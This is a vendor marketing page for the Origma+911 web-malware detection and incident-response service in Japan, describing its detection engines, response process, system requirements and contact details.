Web-based Malware Detection System: Overview
Effectively monitors and discovers web page-embedded malware such as "Drive-by-Download" that abuses web browser/plug-in vulnerabilities. In case of infection, our 911 service provides prompt initial response support.
This is a limited package that offers monitoring service and emergency response service provided by Cyber Defense Institute (services) and Fourteenforty Research Institute (products), in one stop.
Some malware, such as Gumblar,
are often difficult to prevent; this service provides effective monitoring/detection of those activities.
- "Super Heuristic" detection technology without pattern dependency
- Monitoring/operation framework to react to the latest malware development is laid out
- Automatic restoration takes effect immediately after the virus detection
- Available 24 hours each day, the guideline of initial response time is within 24 hours (in the Tokyo 23-ward zone)
- Proper response backed by superior technical capability contains damage to a localized region
- Communication to the police, JPCERT, and other concerned organizations, is supported
- Global partnership enables provision of the latest information in multi-level
If you suspect infection ...
Upon receiving your call, our specialist visits you within 24-hour (in the Tokyo 23-ward zone, as guideline).
» Click here for the details of Cyber Incident Response Support Service
What needs to be done upon virus infection
- Stopping and detoxifying of the web site(s)
- Identifying the infection route
- Establishing/executing preventive measures
- Notifying concerned organizations
- Determining whether the web site service can be resumed
Things to consider when follow-up response does not go as expected
- Re-occurrences of virus infection
- Expansion of damages, with increased number of victims
- Functional recovery to be delayed
- Further collapse of corporate brand credit
Characteristics of the virus detection engine
ZDP (0-Day protection engine)
Protects against malware attacks that target known/unknown security vulnerabilities, notably at times when browsing e-mails and web pages. Protects against the majority of "arbitrary code execution vulnerability".
→ Unpatched Windows OS can also be protected
Static analysis engine
Analyses is initiated without running the program. Its highly versatile malware detection logic initiates heuristic analyses in the code/data section of program.
Sandbox engine
Programs are run within the "Sandbox" virtual execution environment consisting of parts such as virtual CPU, virtual memory, and virtual Windows subsystems. This enables tracing and detecting of malware behavior without affecting the system.
HIPS engine
This monitors program behavior as it detects and halts malware-specific processes such as suspicious API calls, intrusions to other programs, irregular network accesses, keylogger-type behaviors, and backdoor-type actions.
Spread damages by Gumblar-type viruses
What makes preventive measures difficult?
Mere intra-corporate security measure is insufficient, while enforcing strict measures to include subsidiaries and affiliates are practically impossible. Plus, the latest attacking methods make it difficult for the conventional antivirus software to detect.
As we speak, infection is being spread...
Currently infected site count is 60, and is increasing. The incapability of antivirus software has been verified in May. Looking at this virus alone, there is only one company (as of 2010) that successfully secured all specimens.
Possible risks when infected by a virus
- suspension of business until incident is settled
- evaluation of preventive and accident response measures
- complaint handling
- accountability to the public
Cost of post-incident handlings: 48 to 100 million yen(for web server tampering damages)
Work involved with post-incident handlings
- Elicitation / initial response of incident(s)
- Assessment of damages
- Recovery effort
- External communication
- Intra-corporate framework to be laid out
Monitoring scheme based on Origma+ to be laid out
Current situation of web malware threats, and countermeasures thereof
Current situation
Malware itself is set up in another server(s). Page modification causes redirection to the servers set up with malware. Detection and responding on web server-side is difficult, since unknown malware is used.
Action: Origma+ Web-Malware Detection System
- Company in charge of web page contents patrols and monitors its own page(s). FFR yarai engine enables effective detection and collection of web-based malware, regardless of malware's known/unknown statuses
- Promptly halts the web-based malware setting site(s), to stop further contamination to customers and employees
- Specimen to be captured. If actual damages are occurring, precise threat evaluation is initiated
Origma+ system structure
Origma+ base system
- Origma Controller
- Origma Crawler
- Origma Exploit Monitor/Malware Collector
- Origma Alerter
Depending on the observed condition, various services are added to the base system:
- VMWare Player (free of charge) / Workstation license
- Windows license as a VMWare guest OS
- Monitoring application license (Example: Microsoft Office. In order to execute vulnerability monitoring, a Microsoft Office license is required)
System requirements
- OS : an edition of Microsoft Windows XP/Vista/2003 Server/2008 Server
- CPU : Pentium 4 1.4GHz or higher is recommended
- Memory : 2GM or above is recommended
- HDD : 20GB or more is recommended
Under above specification, 10,000 URL/day crawl rate is expected
Note that crawl speed may differ depending on the types of applications to monitor, as well as the network speed.
For inquiry
For more details about the Origma+911 services,use the inquiry form,or contact us directly at the following.
Origma+911 Service Dept., Marketing division
e-mail: sales@cyberdefense.jp
tel:+81(3)-3242-8700
